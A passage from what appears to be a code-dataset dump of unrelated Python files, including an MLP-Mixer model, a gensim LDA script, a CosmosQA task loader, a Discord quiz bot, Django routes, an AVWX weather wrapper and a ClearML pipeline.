        # Optional post-embedding norm; Identity keeps forward() branch-free.
        self.norm = norm_layer if norm_layer is not None else Identity()

    def forward(self, x):
        # Maps [batch, in_channels, H, W] -> [batch, num_patches, embed_dim].
        x = self.patch_embed(x) # [batch, embed_dim, h, w] h,w = patch_resolution
        x = x.flatten(start_axis=2, stop_axis=-1) # [batch, embed_dim, h*w] h*w = num_patches
        x = x.transpose([0, 2, 1]) # [batch, h*w, embed_dim]
        x = self.norm(x) # [batch, num_patches, embed_dim]
        return x
class Mlp(nn.Layer):
    """ MLP module

    Impl using nn.Linear and activation is GELU, dropout is applied.
    Ops: fc -> act -> dropout -> fc -> dropout

    Attributes:
        fc1: nn.Linear
        fc2: nn.Linear
        act: GELU
        dropout1: dropout after fc1
        dropout2: dropout after fc2
    """

    def __init__(self, in_features, hidden_features, dropout):
        super(Mlp, self).__init__()
        # Each Linear gets its own freshly-created parameter attributes.
        w_attr_1, b_attr_1 = self._init_weights()
        self.fc1 = nn.Linear(in_features,
                             hidden_features,
                             weight_attr=w_attr_1,
                             bias_attr=b_attr_1)
        w_attr_2, b_attr_2 = self._init_weights()
        self.fc2 = nn.Linear(hidden_features,
                             in_features,
                             weight_attr=w_attr_2,
                             bias_attr=b_attr_2)
        self.act = nn.GELU()
        # NOTE(review): a single Dropout layer is shared after fc1 and fc2,
        # although the class docstring mentions separate dropout1/dropout2.
        self.dropout = nn.Dropout(dropout)

    def _init_weights(self):
        # Xavier-uniform weights; biases drawn from a small-std normal.
        weight_attr = paddle.ParamAttr(initializer=paddle.nn.initializer.XavierUniform())
        bias_attr = paddle.ParamAttr(initializer=paddle.nn.initializer.Normal(std=1e-6))
        return weight_attr, bias_attr

    def forward(self, x):
        x = self.fc1(x)
        x = self.act(x)
        x = self.dropout(x)
        x = self.fc2(x)
        x = self.dropout(x)
        return x
class MixerBlock(nn.Layer):
    """Mixer Block

    This block implements Mixer layer which contains 2 MLP blocks and residuals.
    The 1st is token-mixing MLP, the 2nd is channel-mixing MLP.

    Attributes:
        mlp_tokens: Mlp layer for token mixing
        mlp_channels: Mlp layer for channel mixing
        tokens_dim: mlp hidden dim for mlp_tokens
        channels_dim: mlp hidden dim for mlp_channels
        norm1: nn.LayerNorm, apply before mlp_tokens
        norm2: nn.LayerNorm, apply before mlp_channels
    """

    def __init__(self, dim, seq_len, mlp_ratio=(0.5, 4.0), dropout=0., droppath=0.):
        super(MixerBlock, self).__init__()
        # Hidden sizes: mlp_ratio[0] scales the token-mixing MLP,
        # mlp_ratio[1] scales the channel-mixing MLP.
        tokens_dim = int(mlp_ratio[0] * dim)
        channels_dim = int(mlp_ratio[1] * dim)
        self.norm1 = nn.LayerNorm(dim, epsilon=1e-6)
        # Token-mixing MLP operates along the sequence axis (length seq_len).
        self.mlp_tokens = Mlp(seq_len, tokens_dim, dropout=dropout)
        self.drop_path = DropPath(droppath)
        self.norm2 = nn.LayerNorm(dim, epsilon=1e-6)
        self.mlp_channels = Mlp(dim, channels_dim, dropout=dropout)

    def forward(self, x):
        # Token mixing: norm -> transpose to [batch, dim, seq] so the MLP
        # mixes across tokens -> transpose back -> droppath -> residual.
        h = x
        x = self.norm1(x)
        x = x.transpose([0, 2, 1])
        x = self.mlp_tokens(x)
        x = x.transpose([0, 2, 1])
        x = self.drop_path(x)
        x = x + h
        # Channel mixing: norm -> MLP over features -> droppath -> residual.
        h = x
        x = self.norm2(x)
        x = self.mlp_channels(x)
        x = self.drop_path(x)
        x = x + h
        return x
class MlpMixer(nn.Layer):
    """MLP-Mixer classification model.

    Args:
        num_classes: int, num of image classes, default: 1000
        image_size: int, input image size, default: 224
        in_channels: int, input image channels, default: 3
        patch_size: int, patch size, default: 16
        num_mixer_layers: int, number of mixer blocks, default: 8
        embed_dim: int, output dimension of patch embedding, default: 512
        mlp_ratio: tuple(float, float), hidden-dim scales for the token and
            channel MLPs (token = ratio[0]*embed_dim, channel = ratio[1]*embed_dim),
            default: (0.5, 4.0)
        dropout: float, dropout rate for the MLPs, default: 0.
        droppath: float, droppath rate for the mixer blocks, default: 0.
        patch_embed_norm: bool, if True, apply norm in patch embedding, default: False
    """
    def __init__(self,
                 num_classes=1000,
                 image_size=224,
                 in_channels=3,
                 patch_size=16,
                 num_mixer_layers=8,
                 embed_dim=512,
                 mlp_ratio=(0.5, 4.0),
                 dropout=0.,
                 droppath=0.,
                 patch_embed_norm=False):
        super(MlpMixer, self).__init__()
        self.num_classes = num_classes
        self.num_features = embed_dim
        self.embed_dim = embed_dim

        norm_layer = nn.LayerNorm(embed_dim, epsilon=1e-6)
        self.patch_embed = PatchEmbedding(
            image_size=image_size,
            patch_size=patch_size,
            in_channels=in_channels,
            embed_dim=embed_dim,
            norm_layer=norm_layer if patch_embed_norm else None)

        blocks = [MixerBlock(embed_dim,
                             self.patch_embed.num_patches,
                             mlp_ratio,
                             dropout,
                             droppath) for _ in range(num_mixer_layers)]
        self.mixer_layers = nn.Sequential(*blocks)

        self.norm = nn.LayerNorm(embed_dim, epsilon=1e-6)
        self.head = nn.Linear(embed_dim, self.num_classes)

    def forward_features(self, x):
        """Embed patches, run all mixer blocks, then global-average-pool tokens."""
        tokens = self.mixer_layers(self.patch_embed(x))
        return self.norm(tokens).mean(axis=1)

    def forward(self, x):
        return self.head(self.forward_features(x))
def build_mlp_mixer(config):
    """Build an MlpMixer by reading options from a config object.

    Args:
        config: config instance containing the setting options
    Returns:
        model: MlpMixer model
    """
    return MlpMixer(num_classes=config.MODEL.NUM_CLASSES,
                    image_size=config.DATA.IMAGE_SIZE,
                    in_channels=3,
                    num_mixer_layers=config.MODEL.MIXER.NUM_LAYERS,
                    embed_dim=config.MODEL.MIXER.HIDDEN_SIZE,
                    mlp_ratio=(0.5, 4.0),
                    dropout=config.MODEL.DROPOUT,
                    droppath=config.MODEL.DROP_PATH)
| StarcoderdataPython |
5155224 | # -*- coding: utf-8 -*-
# This tool reads an MM corpus and creates a cowtop
# feature matrix using LDA.
import argparse
import os.path
import sys
import copy
from gensim import models, corpora
import logging
def main():
    """Train (or resume) an LDA topic model over a serialized MM corpus and
    dump the topics plus the per-document topic matrix as TSV files.

    Optionally filters the dictionary by document frequency first, saving the
    filtered dictionary and the re-mapped corpus alongside the other outputs.
    """
    logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
    parser = argparse.ArgumentParser()
    parser.add_argument('corpus', help='serialized corpus (MM format)')
    parser.add_argument('dictionary', help='serialized Gensim dictionary matching corpus')
    parser.add_argument('outprefix', help='prefix for output files (model and TSV)')
    parser.add_argument('num_topics', type=int, help='number of topics to infer')
    parser.add_argument('--low', type=int, help='lower bound on term-document frequency (absolute)')
    parser.add_argument('--high', type=float, help='upper bound on term-document frequency (proportion)')
    parser.add_argument('--alpha', help='alpha parameter; only "asymmetric" or "auto"')
    parser.add_argument('--etaauto', action='store_true', help="estimate asymmetric priors")
    parser.add_argument('--iterations', type=int, default=50, help='cf. Gensim documentation')
    parser.add_argument('--passes', type=int, default=1, help='cf. Gensim documentation')
    parser.add_argument('--eval_every', type=int, default=10, help='cf. Gensim documentation')
    parser.add_argument('--gamma_threshold', type=float, default=0.001, help='cf. Gensim documentation')
    parser.add_argument('--minimum_probability', type=float, default=0.01, help='cf. Gensim documentation')
    parser.add_argument('--minimum_phi_value', type=float, default=0.01, help='cf. Gensim documentation')
    parser.add_argument('--chunksize', type=int, help='chunk size')
    parser.add_argument('--resume', help='specify a previously created LDA model')
    parser.add_argument('--erase', action='store_true', help="erase output files if present")
    parser.add_argument('--distributed', action='store_true', help="run on cluster (already set up!)")
    args = parser.parse_args()

    # Sanity-check parameters.
    if args.alpha and args.alpha not in ('asymmetric', 'auto'):
        sys.exit('Illegal value for alpha.')  # fix: error message said "alpa"
    eta = "auto" if args.etaauto else None
    chunksize = 1000 if not args.chunksize else args.chunksize

    # Sanity-check num_topics.
    if args.num_topics < 2:
        sys.exit('Number of topics must be greater or equal to 2.')

    # Build output file names.
    fn_matrix_txt = args.outprefix + "_matrix_lda.tsv"
    fn_topics = args.outprefix + "_topics_lda.tsv"
    fn_model = args.outprefix + ".lda"

    # Check input files.
    infiles = [args.corpus, args.dictionary]
    if args.resume:
        infiles.append(args.resume)
    for fn in infiles:
        if not os.path.exists(fn):
            sys.exit("Input file does not exist: " + fn)

    # Check (potentially erase) output files.
    outfiles = [fn_matrix_txt, fn_topics]
    if not args.resume:
        outfiles.append(fn_model)

    # In case dictionary filters are used, check the extra output files too.
    fn_newdict = fn_newdict_txt = fn_newcorp = None
    if args.low or args.high:
        fn_newdict = args.outprefix + "_filtered.dict"
        outfiles.append(fn_newdict)
        fn_newdict_txt = args.outprefix + "_filtered.dict.txt"
        outfiles.append(fn_newdict_txt)
        fn_newcorp = args.outprefix + "_filtered.mm"
        outfiles.append(fn_newcorp)

    for fn in outfiles:
        if fn is not None and os.path.exists(fn):
            if args.erase:
                try:
                    os.remove(fn)
                except OSError:  # fix: was a bare except hiding all errors
                    sys.exit("Cannot delete pre-existing output file: " + fn)
            else:
                sys.exit("Output file already exists: " + fn)

    # Load corpus and dictionary.
    dictionary = corpora.dictionary.Dictionary.load(args.dictionary)
    corpus = corpora.MmCorpus(args.corpus)

    # If desired, filter the dictionary and re-map the corpus to the new ids.
    if args.low or args.high:
        new_dict = copy.deepcopy(dictionary)
        # Only pass the bounds the user actually supplied so that
        # filter_extremes keeps its own default for the other one.
        if args.low and not args.high:
            new_dict.filter_extremes(no_below=args.low)
        elif args.high and not args.low:
            new_dict.filter_extremes(no_above=args.high)
        else:
            new_dict.filter_extremes(no_below=args.low, no_above=args.high)
        new_dict.save(fn_newdict)
        new_dict.save_as_text(fn_newdict_txt)
        # Transform corpus to the filtered vocabulary.
        old2new = {dictionary.token2id[token]: new_id for new_id, token in new_dict.iteritems()}
        vt = models.VocabTransform(old2new)
        corpus = vt[corpus]
        corpora.MmCorpus.serialize(fn_newcorp, corpus, id2word=new_dict)
        # Reassign new dict to old variable.
        dictionary = new_dict

    if args.resume:
        # Just load an old model.
        lda = models.LdaModel.load(args.resume, mmap='r')
    else:
        # Train a fresh model.
        lda = models.LdaModel(corpus, alpha=args.alpha, eta=eta, id2word=dictionary,
                              num_topics=args.num_topics, distributed=args.distributed,
                              chunksize=chunksize, iterations=args.iterations,
                              passes=args.passes, eval_every=args.eval_every,
                              gamma_threshold=args.gamma_threshold,
                              minimum_probability=args.minimum_probability,
                              minimum_phi_value=args.minimum_phi_value)
        lda.save(fn_model)

    # Dump topics, one line per topic with its top-25 "word probability" pairs.
    # fix: use context managers so files are always closed, and write str
    # (the old str + bytes concatenation raises TypeError on Python 3).
    with open(fn_topics, 'w', encoding='utf-8') as outf:
        for i in range(args.num_topics):
            t = lda.show_topic(i, 25)
            outf.write('topic' + str(i) + '\t' + '\t'.join([' '.join([x[0], str(x[1])]) for x in t]) + '\n')

    # Dump document-topic associations. Human-readable.
    with open(fn_matrix_txt, 'w', encoding='utf-8') as mtf:
        corpus_lda = lda[corpus]
        for i, doc in enumerate(corpus_lda):
            mtf.write('document' + str(i) + '\t' + '\t'.join([' '.join([str(x[0]), str(x[1])]) for x in doc]) + '\n')


if __name__ == "__main__":
    main()
| StarcoderdataPython |
4909366 | <filename>jiant/jiant/tasks/lib/cosmosqa.py
import pandas as pd
from dataclasses import dataclass
from jiant.tasks.lib.templates.shared import labels_to_bimap
from jiant.tasks.lib.templates import multiple_choice as mc_template
@dataclass
class Example(mc_template.Example):
    # Raw CosmosQA example: prompt, four answer choices and a gold label.
    @property
    def task(self):
        # Links the example back to its owning task class.
        return CosmosQATask
@dataclass
class TokenizedExample(mc_template.TokenizedExample):
    # Tokenized form of an example; behavior fully inherited from the template.
    pass
@dataclass
class DataRow(mc_template.DataRow):
    # Featurized row ready for batching; inherited from the template.
    pass
@dataclass
class Batch(mc_template.Batch):
    # Collated batch of DataRows; inherited from the template.
    pass
class CosmosQATask(mc_template.AbstractMultipleChoiceTask):
    """CosmosQA: 4-way multiple-choice commonsense reading comprehension."""

    Example = Example
    # NOTE(review): mirrors the original code — TokenizedExample aliases
    # Example here; confirm that is intentional.
    TokenizedExample = Example
    DataRow = DataRow
    Batch = Batch

    CHOICE_KEYS = [0, 1, 2, 3]
    CHOICE_TO_ID, ID_TO_CHOICE = labels_to_bimap(CHOICE_KEYS)
    NUM_CHOICES = len(CHOICE_KEYS)

    def get_train_examples(self):
        """Examples from the training csv."""
        return self._create_examples(path=self.train_path, set_type="train")

    def get_val_examples(self):
        """Examples from the validation csv."""
        return self._create_examples(path=self.val_path, set_type="val")

    def get_test_examples(self):
        """Examples from the test csv (gold labels are dummies)."""
        return self._create_examples(path=self.test_path, set_type="test")

    @classmethod
    def _create_examples(cls, path, set_type):
        """Read the csv at *path* and build one Example per row."""
        frame = pd.read_csv(path)
        examples = []
        for row_idx, row in enumerate(frame.itertuples()):
            # Test rows carry no gold label; substitute the last choice key.
            gold = row.label if set_type != "test" else cls.CHOICE_KEYS[-1]
            examples.append(
                Example(
                    guid="%s-%s" % (set_type, row_idx),
                    prompt=row.context + " " + row.question,
                    choice_list=[row.answer0, row.answer1, row.answer2, row.answer3],
                    label=gold,
                )
            )
        return examples
| StarcoderdataPython |
9629467 | <filename>quiz.py<gh_stars>0
import asyncio
import random
import re
import unidecode
import os
import numpy as np
import operator
import discord
class Question:
    """A generic quiz question with a list of answer options.

    Each option has a matching reaction emoji; ``correct_idx`` is the index
    of the right option (None for open questions) and ``score`` the points
    awarded for answering correctly.
    """
    def __init__(self, question, propositions, proposition_emojis, correct_idx, score):
        self.question = question
        self.propositions = propositions
        self.proposition_emojis = proposition_emojis
        assert len(self.propositions) == len(self.proposition_emojis)
        self.correct_idx = correct_idx
        self.score = score

    @property
    def ask(self):
        """Render the question as the text block posted to the channel."""
        parts = ["[" + str(self.score) + " points]", self.question]
        for emoji, proposition in zip(self.proposition_emojis, self.propositions):
            parts.append(emoji + ' ' + proposition)
        return '\n'.join(parts) + '\n'
class Carré(Question):
    # "Carré": four-option multiple-choice question using the digit emojis 1-4.
    def __init__(self, question, propositions, correct_idx, score):
        # propositions must contain exactly four entries to match the emojis.
        super().__init__(question, propositions, ['1️⃣', '2️⃣','3️⃣','4️⃣'], correct_idx, score)
class VraiFaux(Question):
    # True/False question: options are 'Vrai'/'Faux' with thumbs-up/down emojis.
    def __init__(self, question, answer, score):
        # int(not answer): answer=True -> index 0 ('Vrai'), False -> index 1 ('Faux').
        super().__init__(question, ['Vrai', 'Faux'], ['👍', '👎'], int(not answer), score)
class Cash(Question):
    # Open ("cash") question: no propositions/emojis; the expected free-text
    # answer is stored in ``self.answer`` and ``correct_idx`` is None.
    def __init__(self, question, answer, score):
        super().__init__(question, [], [], None, score)
        self.answer = answer
class Quiz:
    """Quiz state for the discord bot: question list, team scores and the
    bot messages that must be cleaned up between questions."""

    def __init__(self, bot):
        self.questions = []
        self.current_question_idx = 0
        self.scores = {}             # team role -> accumulated points
        self.messages = set()        # bot messages to delete before the next question
        self.bot = bot
        self.players_answers = {}    # player -> emoji reaction given

    @property
    def current_question(self):
        """The Question currently being asked."""
        return self.questions[self.current_question_idx]

    @staticmethod
    def _make_question(question, answer, propositions, score):
        """Build the right Question subclass from parsed fields.

        An int answer is the index of the correct proposition (Carré),
        a bool answer means Vrai/Faux, anything else is a free-text Cash answer.
        """
        if type(answer) == int:
            return Carré(question, propositions, answer, score)
        if type(answer) == bool:
            return VraiFaux(question, answer, score)
        return Cash(question, answer, score)

    def load_questions(self, question_file):
        """Parse *question_file* and append its questions.

        Question blocks are separated by blank lines; '#' lines are comments.
        Recognized fields: "question:", "answer:", "score:" and "-"/"->"
        proposition lines ("->" marks the correct one).
        """
        with open(question_file, encoding='utf-8', errors='replace') as qfile:
            lines = qfile.readlines()

        question, answer, propositions, score = None, None, [], 10

        def flush():
            # Append the current block as a Question if it is complete.
            nonlocal question, answer, propositions, score
            if question is not None:
                self.questions.append(self._make_question(question, answer, propositions, score))
            question, answer, propositions, score = None, None, [], 10

        for line in lines:
            stripped = line.strip()
            if stripped.startswith('#'):
                continue  # comment line
            if stripped == '':
                flush()   # blank line ends the current question block
                continue
            lowered = stripped.lower()
            # Field value follows the first ':' — or is the whole line when
            # there is none (str.find returns -1, and -1 + 1 == 0).
            # fix: the index is now computed on the stripped line; computing
            # it on the raw line broke parsing of indented lines.
            value = stripped[stripped.find(':') + 1:].strip()
            if lowered.startswith('question'):
                question = value
            elif lowered.startswith('answer'):
                answer = bool(int(value)) if value in ('0', '1') else value
            elif lowered.startswith('score'):
                score = int(value)
            elif lowered.startswith('->'):  # the correct proposition
                propositions.append(value[2:])
                answer = len(propositions) - 1
            elif lowered.startswith('-'):
                propositions.append(value[1:])
        # fix: also flush the final block — previously the last question was
        # silently dropped when the file lacked a trailing blank line.
        flush()

    def start_round(self, round_name):
        """Reset all team scores and load the round's question file."""
        for team in self.scores.keys():
            self.scores[team] = 0
        self.load_questions('./qualifs/' + round_name)
        self.current_question_idx = -1
        self.question_pending = False

    async def clear_messages(self):
        """Delete every quiz message previously sent to the channel."""
        for message in self.messages:
            cache_msg = discord.utils.get(self.bot.cached_messages, id=message.id)
            await cache_msg.delete()
        self.messages = set()

    async def skip_question(self, ctx):
        """Abort the pending question and move on to the next one."""
        self.question_pending = False
        # fix: ask_next is a coroutine and was previously never awaited,
        # so skipping silently did nothing.
        await self.ask_next(ctx)

    async def ask_next(self, ctx):
        """Post the next question with its reaction choices, if any remain."""
        if not self.question_pending and self.current_question_idx < len(self.questions) - 1:
            self.question_pending = True
            await self.clear_messages()
            self.current_question_idx += 1
            self.players_answers = {}
            current_question = self.questions[self.current_question_idx]
            message = '**Question ' + str(self.current_question_idx + 1) + '/' + str(len(self.questions)) + '** ' + current_question.ask
            current_question.message = await ctx.send(message)
            self.messages.add(current_question.message)
            for reaction in current_question.proposition_emojis:
                await current_question.message.add_reaction(reaction)

    async def conclude_question(self, ctx):
        """Score the players' reactions, reveal the answer and show the board."""
        self.scores_deltas = {team_role: 0 for team_role in self.scores.keys()}
        current_question = self.current_question
        # NOTE(review): for Cash questions correct_idx is None, so scoring a
        # recorded answer would fail — confirm answers are only ever recorded
        # via the reactions added in ask_next (Cash adds none).
        for player in self.players_answers.keys():
            for team_role in self.scores_deltas.keys():
                if team_role in player.roles:
                    # debug trace of given vs expected reaction
                    print(self.players_answers[player], current_question.proposition_emojis[current_question.correct_idx])
                    if self.players_answers[player] == current_question.proposition_emojis[current_question.correct_idx]:
                        self.scores_deltas[team_role] += current_question.score
                        self.scores[team_role] += current_question.score
        if not isinstance(current_question, Cash):
            message = "La réponse était **" + current_question.proposition_emojis[current_question.correct_idx] + current_question.propositions[current_question.correct_idx] + '**'
        else:
            message = "La réponse était **" + current_question.answer + '**'
        self.messages.add(await ctx.send(message))
        await self.show_scores(ctx, show_deltas=True)
        self.question_pending = False

    async def show_scores(self, ctx, show_deltas=False):
        """Post the score board, highest first, optionally with round deltas."""
        message = "**Scores**\n"
        sorted_scores = sorted(self.scores.items(), key=operator.itemgetter(1), reverse=True)
        for team_score in sorted_scores:
            message += team_score[0].mention + ' : ' + str(team_score[1])
            if show_deltas:
                message += ' **(+' + str(self.scores_deltas[team_score[0]]) + ')**'
            message += '\n'
        self.messages.add(await ctx.send(message))
| StarcoderdataPython |
371751 | <reponame>idosavion/coursist<filename>academic_helper/urls.py
from django.http import JsonResponse
from django.urls import path, include
from academic_helper.views.basic import IndexView
from academic_helper.views.courses import CoursesView, CourseDetailsView
from academic_helper.views.other import AjaxView, AboutView
from academic_helper.views.schedule import ScheduleView
from academic_helper.views.user_view import UserView
def healthy(request):
    """Health-check endpoint: always responds with a {"status": 200} payload."""
    payload = {"status": 200}
    return JsonResponse(payload)
# URL routing table mapping each path to its (class-based) view.
urlpatterns = [
    path("", IndexView.as_view(), name="index"),  # landing page
    path("ajax/", AjaxView.as_view(), name="ajax"),  # ajax endpoint
    path("courses/", CoursesView.as_view(), name="courses"),  # course list
    path("courses/<int:course_number>/", CourseDetailsView.as_view(), name="course-details"),  # single course
    path("accounts/", include("allauth.urls"), name="accounts"),  # django-allauth auth flows
    path("about/", AboutView.as_view(), name="about"),
    path("schedule/", ScheduleView.as_view(), name="schedule"),
    path("user/<str:username>/", UserView.as_view(), name="user")  # per-user profile page
]
| StarcoderdataPython |
1618960 | <filename>elib_wx/avwx/__init__.py
# coding=utf-8
# type: ignore
"""
<NAME> - <EMAIL>
Original source: https://github.com/flyinactor91/AVWX-Engine
Modified by <EMAIL>
"""
# type: ignore
# type: ignore
# stdlib
from datetime import datetime
from os import path
# module
from . import metar, service, speech, structs, summary, taf, translate
from .core import valid_station
from .exceptions import BadStationError
from .static import INFO_KEYS
# Absolute path to the bundled station-info JSON file, next to this module.
INFO_PATH = path.dirname(path.realpath(__file__)) + '/stations.json'
# STATIONS = json.load(open(INFO_PATH))
# type: ignore
class Report:
    """
    Base report class: validates the station ident and resolves the
    fetch service for the concrete report type.
    """

    #: UTC Datetime object when the report was last updated
    last_updated: datetime
    #: The un-parsed report string. Fetched on update()
    raw: str
    #: ReportData dataclass of parsed data values and units. Parsed on update()
    data: structs.ReportData
    #: ReportTrans dataclass of translation strings from data. Parsed on update()
    translations: structs.ReportTrans
    #: Units inferred from the station location and report contents
    units: structs.Units

    _station_info: structs.StationInfo

    def __init__(self, station: str) -> None:
        # Raises a BadStation error if needed
        valid_station(station)
        #: 4-character ICAO station ident code the report was initialized with
        self.station = station
        # The report type ('metar'/'taf') is derived from the subclass name
        report_type = self.__class__.__name__.lower()
        #: Service object used to fetch the report string
        # noinspection PyCallingNonCallable
        self.service = service.get_service(station)(report_type)

    def update(self, report: str = None) -> bool:
        """
        Updates report elements. Not implemented here; subclasses must override.
        """
        raise NotImplementedError()
class Metar(Report):
    """
    Class to handle METAR report data
    """

    metar_data: structs.MetarData
    metar_translations: structs.MetarTrans

    def update(self, report: str = None) -> bool:
        """Updates raw, data, and translations by fetching and parsing the METAR report

        Returns True if a new report is available, else False
        """
        if report is not None:
            self.raw = report
        else:
            raw = self.service.fetch(self.station)
            # fix: ``raw`` is only a class-level annotation, so the attribute
            # does not exist before the first successful update — comparing
            # against self.raw directly raised AttributeError
            if raw == getattr(self, 'raw', None):
                return False
            self.raw = raw
        self.metar_data, self.units = metar.parse(self.station, self.raw)
        self.metar_translations = translate.metar(self.metar_data, self.units)
        self.last_updated = datetime.utcnow()
        return True

    @property
    def summary(self) -> str:
        """
        Condensed report summary created from translations
        """
        # fix: getattr — the attribute does not exist before the first update
        if not getattr(self, 'metar_translations', None):
            self.update()
        return summary.metar(self.metar_translations)

    @property
    def speech(self) -> str:
        """
        Report summary designed to be read by a text-to-speech program
        """
        # fix: getattr — the attribute does not exist before the first update
        if not getattr(self, 'metar_data', None):
            self.update()
        return speech.metar(self.metar_data, self.units)
class Taf(Report):
    """
    Class to handle TAF report data
    """

    taf_data: structs.TafData
    taf_translations: structs.TafTrans

    def update(self, report: str = None) -> bool:
        """
        Updates raw, data, and translations by fetching and parsing the TAF report

        Returns True if a new report is available, else False
        """
        if report is not None:
            self.raw = report
        else:
            raw = self.service.fetch(self.station)
            # fix: ``raw`` is only a class-level annotation, so the attribute
            # does not exist before the first successful update — comparing
            # against self.raw directly raised AttributeError
            if raw == getattr(self, 'raw', None):
                return False
            self.raw = raw
        self.taf_data, self.units = taf.parse(self.station, self.raw)
        self.taf_translations = translate.taf(self.taf_data, self.units)
        self.last_updated = datetime.utcnow()
        return True

    @property
    def summary(self):
        """
        Condensed summary for each forecast created from translations
        """
        # fix: getattr — the attribute does not exist before the first update
        if not getattr(self, 'taf_translations', None):
            self.update()
        return [summary.taf(trans) for trans in self.taf_translations.forecast]

    @property
    def speech(self) -> str:
        """
        Report summary designed to be read by a text-to-speech program
        """
        # fix: getattr — the attribute does not exist before the first update
        if not getattr(self, 'taf_data', None):
            self.update()
        return speech.taf(self.taf_data, self.units)
| StarcoderdataPython |
3541158 | from clearml import Task
from clearml.automation import PipelineController
def pre_execute_cb(a_pipeline, a_node, current_param_override):
    # type (PipelineController, PipelineController.Node, dict) -> bool
    """Hook invoked right before a pipeline node is launched.

    Returning False would skip this node (and its subtree); returning
    True lets the DAG continue.
    """
    print(f'Cloning Task id={a_node.base_task_id} with parameters: {current_param_override}')
    return True
def post_execute_cb(a_pipeline, a_node):
    # type (PipelineController, PipelineController.Node) -> None
    """Hook invoked after a pipeline node has completed."""
    print(f'Completed Task id={a_node.executed}')
    # the concrete Task is available via Task.get_task(task_id=a_node.executed)
    return
# Assemble a two-step pipeline (data subset creation -> model training)
# and run it locally on the 'services' queue.
pipe = PipelineController('T4C pipeline', 't4c', '0.0.2')
pipe.set_default_execution_queue('services')
# TODO if dataset is already uploaded, don't go through subset creation
# Stage 1: pin the data-staging task to a specific commit on master.
pipe.add_step(name='stage_data', base_task_project='t4c', base_task_name='subset_creation',
              task_overrides={"script.version_num":"3c1b660826c90a55a6c246c9f5ca18982ea2acff","script.branch": "master"})
# Stage 2: training, using the latest registered train_model task.
pipe.add_step(name='train', base_task_project='t4c', base_task_name='train_model',)
#task_overrides={"script.version_num":"3c1b660826c90a55a6c246c9f5ca18982ea2acff","script.branch": "master"})
# YAML override: parameter_override={'Args/overrides': '[the_hydra_key={}]'.format(a_new_value)})
pipe.start_locally()
#pipe.start()
print('done')
| StarcoderdataPython |
11297400 | from setuptools import setup
# Read the long description from the README so PyPI can render it as Markdown.
# fix: specify the encoding explicitly — the platform default may not be UTF-8.
with open('README.md', 'r', encoding='utf-8') as fh:
    long_description = fh.read()

setup(
    name='ingreedypy',
    py_modules=['ingreedypy'],
    version='1.3.5',
    description='ingreedy-py parses recipe ingredient lines into a object',
    long_description=long_description,
    long_description_content_type='text/markdown',
    author='<NAME>',
    author_email='<EMAIL>',
    url='https://github.com/openculinary/ingreedy-py',
    keywords=['ingreedy', 'ingreedypy', 'recipe', 'parser'],
    install_requires=[
        'parsimonious'
    ],
    extras_require={
        'tests': [
            'pytest',
            'pytest-cov',
        ]
    },
    classifiers=[
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
)
| StarcoderdataPython |
1782494 | from flask_wtf import FlaskForm
from wtforms import StringField,TextAreaField,SubmitField,RadioField
from wtforms.validators import Required
class PitchForm(FlaskForm):
    """Form for submitting a new pitch with a title, body and category."""
    title = StringField('Pitch title',validators=[Required()])
    pitch = TextAreaField('Pitch', validators=[Required()])
    # Category is a fixed set of pitch types rendered as radio buttons.
    category = RadioField('Category', choices=[('Interview','Interview'),('Slogan','Slogan'),('Advertisement','Advertisement'),('Pickup-lines','Pickup-lines')],validators=[Required()])
    submit = SubmitField('Submit')
class UpdateProfile(FlaskForm):
    """Form for editing the user's bio on their profile page."""
    bio = TextAreaField('Tell us about you.',validators = [Required()])
    submit = SubmitField('Submit')
class CommentForm(FlaskForm):
    """Form for adding a comment to a pitch."""
    comment = TextAreaField('Add a Comment',validators = [Required()])
    submit = SubmitField('Submit')
class Upvote(FlaskForm):
    """Single-button form used to like a pitch."""
    submit = SubmitField('Like')
class Downvote(FlaskForm):
submit = SubmitField('Dislike') | StarcoderdataPython |
9743766 | import os, glob
class ImageListCreator(object):
    """Creates a text file ("images.txt", next to this script) listing the
    image files found in a given directory."""

    def __init__(self):
        pass

    # This takes a directory name, looks for image files inside it and
    # creates a text file listing those images' locations.
    def make_list_image_filenames(self, image_path):
        """Write images.txt containing one "<image_path>/<file>" line per
        image (jpeg/jpg/JPEG/png) found directly inside *image_path*.

        Prints an error message instead when *image_path* does not exist.
        """
        dir_path = os.path.dirname(os.path.realpath(__file__))
        filename = image_path
        if not os.path.exists(filename):
            print("No Folder exist of name \"" + image_path + "\" Please create and put images into it")
            return
        os.chdir(filename)
        try:
            types = ('*.jpeg', '*.jpg', '*.JPEG', '*.png')  # the tuple of file types
            files_grabbed = []
            for pattern in types:
                files_grabbed.extend(glob.glob(pattern))
            # fix: use a context manager so the file is closed even on error
            with open(os.path.join(dir_path, "images.txt"), "w") as text_file:
                for file in files_grabbed:
                    text_file.write(os.path.join(filename, file) + "\n")
            print("images.txt created at location : " + dir_path)
        finally:
            # fix: always return to the script directory — previously the
            # working directory stayed changed if an error occurred above
            os.chdir(dir_path)
if __name__ == "__main__":
# How to use
fm = ImageListCreator()
#"Parameter: folder name where your images are located"
fm.make_list_image_filenames("images") | StarcoderdataPython |
9797087 | from wx_pay.unified import WxPayOrderClient # NOQA
from wx_pay.query import WxPayQueryClient # NOQA
| StarcoderdataPython |
5130356 | from chainer_chemistry.iterators.balanced_serial_iterator import BalancedSerialIterator # NOQA
from chainer_chemistry.iterators.index_iterator import IndexIterator # NOQA
| StarcoderdataPython |
49592 | <filename>src/main.py
from utility import util
# Shared Alpaca brokerage connection, established once at import time.
CONN = util.connectAlpaca()
class algo:
    # Placeholder for the trading algorithm implementation.
    pass
| StarcoderdataPython |
5030179 | <reponame>utyman/tdc-wiretapping<filename>tdc-wiretapping/inf_utils.py
import math
from clint.textui import colored, puts
from os import system, remove
from graphviz import Digraph
import ntpath
def dump_results(filein, symbol_dict, entropy, max_entropy, totalEvents):
    """Write a ranked per-symbol information table to data.dat, render it to
    a PNG with gnuplot, then delete the temporary data file.

    :param filein: input file name (used only to label the output PNG)
    :param symbol_dict: mapping of symbol -> occurrence count
    :param entropy: pre-computed entropy (forwarded to gnuplot)
    :param max_entropy: pre-computed max entropy (forwarded to gnuplot)
    :param totalEvents: total number of observed events
    """
    highest_info = 0.0
    # fix: context manager instead of a manually-closed handle, no shadowing
    # of the builtins ``file``/``max``, and each symbol's information value
    # is computed only once instead of twice
    with open('data.dat', 'w+') as datafile:
        rank = 0
